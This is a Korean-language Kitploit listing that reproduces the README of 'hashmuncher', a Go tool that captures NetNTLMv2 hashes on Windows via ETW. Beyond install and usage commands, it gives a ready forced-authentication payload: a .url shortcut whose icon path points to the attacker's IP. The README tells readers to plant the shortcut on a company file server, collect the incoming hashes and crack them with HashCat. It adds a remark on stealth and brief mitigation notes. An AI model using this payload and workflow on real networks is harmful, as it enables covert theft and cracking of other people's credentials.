Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
hashmuncher — Windows 8.1 / Windows Server 2016 이상에서 관리자 권한으로 ETW를 사용하여 NetNTLMv2 해시를 캡처합니다. | Kitploit
도구/GitHubGitHub/lkarlslund/hashmuncher
Packet Sniffing & AnalysisPassword AttacksHash AnalysisInformation GatheringPenetration TestingRed Teaming
GitHublkarlslund/hashmuncher

hashmuncher

Windows 8.1 / Windows Server 2016 이상에서 관리자 권한으로 ETW를 사용하여 NetNTLMv2 해시를 캡처합니다.

저장소 보기
126763년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Hash Muncher

Windows에서 관리자 권한으로 ETW를 사용해 NetNTLMv2 해시를 수집하세요

GitHub all releases GitHub Workflow Status

  • Windows 8.1 / Windows 2016 이상에서 상승된(관리자) 권한이 필요합니다
  • ETW(Event Tracing for Windows)를 사용하여 SMB 인증 패킷의 원시 패킷 데이터에 접근합니다
  • NTLM 메시지 유형 2와 3을 디코딩합니다
  • stdout 또는 파일로 출력합니다
  • 처리를 중지하려면 Ctrl-C를 누르거나 timeout 옵션을 사용하세요
  • HashCat에서 -m 5600을 사용하여 해시를 크랙하세요

Hash Muncher 받기

이 도구를 설치하고 실행하는 세 가지 방법이 있습니다

A) releases에서 자동 빌드된 바이너리 다운로드

B) 이 Go 명령으로 Windows에 빌드 및 설치

  • Golang 필요
root@kitploit:~
go install github.com/lkarlslund/hashmuncher@latest

C) PowerShell이 설치된 Golang 지원 플랫폼에서 Windows 바이너리 크로스 컴파일

  • Golang 및 PowerShell 필요
root@kitploit:~
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1

사용법

  1. Hash Muncher는 내장 SMB 서비스가 초기 요청을 보내고 수신하며 대상에 응답 패킷을 보내야 하므로 Windows 방화벽이 "파일 및 프린터 공유"를 허용하는지 확인하세요.

  2. 상승된 프롬프트에서 Hash Muncher를 실행하세요

root@kitploit:~
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
  1. 이제 누군가가 내 컴퓨터에 인증하길 기다리거나, 아래처럼 인기 있는 공유 파일서버에 URL 바로가기를 설치하세요.
root@kitploit:~
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1

IP 주소를 Hash Muncher 기계의 주소로 바꾸고, 파일을 (회사 전체) 파일서버에 'whatever.url'로 저장한 다음 해시가 쏟아져 들어오는 것을 지켜보세요.

Red Team Notes - Forced Authentication에 언급된 다른 방법들도 있으며, 모든 사람에게 Word 문서를 메일로 보내도 성공할 수 있겠지만 전혀 은밀하지 않습니다.

탐지

  • 제가 본 것은 없지만, 피드백을 남겨주세요

완화

  • ETW 부분에 대한 완화책은 없습니다. Microsoft에 따르면 이는 Windows 설계의 일부입니다
  • 강력한 암호를 사용하세요! NetNTLMv2 크래킹은 전혀 빠르지 않지만, 약한 암호라면 충분히 가능합니다.
  • NTLM을 완전히 비활성화하세요! 고통스럽지 않을 수는 없겠지만 - Farewell NTLM - It is time to disable NTLM을 참고하세요

역사

저는 ETW를 이리저리 만져보고 있었는데, Nettitude Labs의 매우 멋진 연구를 본 순간 이걸 제가 가장 좋아하는 언어인 Golang으로 쉽게 사용할 수 있는 도구로 만들어야겠다고 생각했습니다! Nettitude Labs에는 .Net 프레임워크에서 실행되는 C#으로 작성된 작동하는 POC가 있으며, 그것이 여러분에게 더 나은 선택이 될 수도 있습니다. 그래서 저는 여기서 새로운 것을 발명한 것이 아니라, 단지 대안으로 이 도구를 추가한 것뿐입니다.

Windows 보안 관련 내용을 좋아하신다면 제 공격 그래프 도구 Adalanche도 마음에 드실 겁니다.

도구 다운로드